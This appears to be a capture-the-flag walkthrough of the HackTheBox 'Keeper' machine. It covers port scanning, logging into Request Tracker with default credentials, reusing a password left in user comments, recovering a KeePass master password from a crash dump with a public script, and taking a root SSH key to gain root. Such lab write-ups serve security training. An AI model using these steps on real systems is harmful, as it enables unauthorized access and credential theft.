HackTheBox :: Keeper

Creator: knightmare

Machine URL: https://app.hackthebox.com/machines/Keeper

Difficulty: Easy

Initial enumeration

As usual, we start with a TCP nmap scan.

# Nmap 7.94 scan initiated Sat Aug 12 21:03:18 2023 as: nmap -p- -oA nmap/nmap_initial --min-rate=4000 -vv -sC -sV 10.129.229.41
Nmap scan report for keeper.htb (10.129.229.41)
Host is up, received echo-reply ttl 63 (0.037s latency).
Scanned at 2023-08-12 21:03:19 CEST for 24s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKHZRUyrg9VQfKeHHT6CZwCwu9YkJosNSLvDmPM9EC0iMgHj7URNWV3LjJ00gWvduIq7MfXOxzbfPAqvm2ahzTc=
|   256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBe5w35/5klFq1zo5vISwwbYSVy1Zzy+K9ZCt0px+goO
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 12 21:03:43 2023 -- 1 IP address (1 host up) scanned in 25.48 seconds

Only two ports are open: TCP 80 for nginx and TCP 22 for SSH.
We will target the Web Server on TCP 80 first.

nginx

After navigating to the machine IP in the browser, we are greeted with a simple web page:

After adding keeper.htb and tickets.keeper.htb to our hosts file, we can visit http://tickets.keeper.htb/rt/

Best Practical Request Tracker (RT)

We have the login page for Best Practical Request Tracker (RT):

Software version: 4.4.4
Source code: GitHub

We note that the version is fairly old and we may find some unpatched vulnerabilities.

But first, we can try the default username and password.
Fortunately, root:password works!

Interesting tickets

There is only one of interest – http://tickets.keeper.htb/rt/Ticket/Display.html?id=300000

We note the info it gives us:

• root (Enoch Root) had issues with a KeePass database on Windows and attached its crash dump to an issue.
• lnorgaard (Lise Nørgaard) removed the attachment and saved it to their home folder for security reasons.

Credentials for lnorgaard

While further walking the app, in the Admin –> Users section we find a default password for user lnorgaard in their comments section:

http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27

These credentials are reused and we can SSH to the box as lnorgaard.

ssh lnorgaard@keeper.htb

lnorgaard

Grab a user flag in /home/lnorgaard/user.txt

The home folder contains a ZIP archive RT30000.zip. This must be the file relevant to the ticket we’ve seen before.
Transfer it to the attacking machine and unzip it.

┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ unzip RT30000.zip
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp
 extracting: passcodes.kdbx

We get the crash dump for KeePass and a KeePass database file.

Extracting the KeePass master password from the dump file

It may be possible to extract the master password from the dump file!
I’ve attempted to use this Python script for the task: https://github.com/CMEPW/keepass-dump-masterkey

┌──(fluff㉿kali)-[/tmp/keepass-dump-masterkey]
└─$ python3 poc.py -d /opt/ctf/htb/keeper/KeePassDumpFull.dmp
2023-08-12 21:35:47,517 [.] [main] Opened /opt/ctf/htb/keeper/KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
...

There are some issues with special characters. A quick Google search for dgrd med flde reveals the name of the Danish dish – Rødgrød med fløde.

I will use the kpcli utility to interact with the KeePass database file that we have looted.

┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ kpcli

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> open passcodes.kdbx
Provide the master password: ************************* #Rødgrød med fløde
Error opening file: Couldn't load the file passcodes.kdbx

Error(s) from File::KeePass:
The database key appears invalid or else the database is corrupt.

kpcli:/> open passcodes.kdbx
Provide the master password: ************************* #rødgrød med fløde
kpcli:/> ls
=== Groups ===
passcodes/

Success! The KeePass database master password is rødgrød med fløde.
Let’s find some credentials.

SSH Private Key for root

kpcli:/> ls *
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/> ls */*
/passcodes/eMail:

/passcodes/General:

/passcodes/Homebanking:

/passcodes/Internet:

/passcodes/Network:
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System

/passcodes/Recycle Bin:
=== Entries ===
2. Sample Entry                                               keepass.info
3. Sample Entry #2                          keepass.info/help/kb/testform.

/passcodes/Windows:
kpcli:/>

kpcli:/> cd /passcodes/Network
kpcli:/passcodes/Network> ls
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System
kpcli:/passcodes/Network> show -f 0

Title: keeper.htb (Ticketing Server)
Uname: root
 Pass: <REDACTED>
  URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
       Encryption: none
       Comment: rsa-key-20230519
       Public-Lines: 6
       AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
       <REDACTED>

It looks like we have a root SSH private key for PuTTY!
Let’s convert it to the OpenSSH-acceptable format with puttygen:

┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ puttygen key.putty -O private-openssh -o id_rsa

And use the key to SSH:

┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ ssh root@keeper.htb -i id_rsa
...
root@keeper:~# id
uid=0(root) gid=0(root) groups=0(root)
root@keeper:~#

We are root!
Grab the root flag in /root/root.txt and we are done.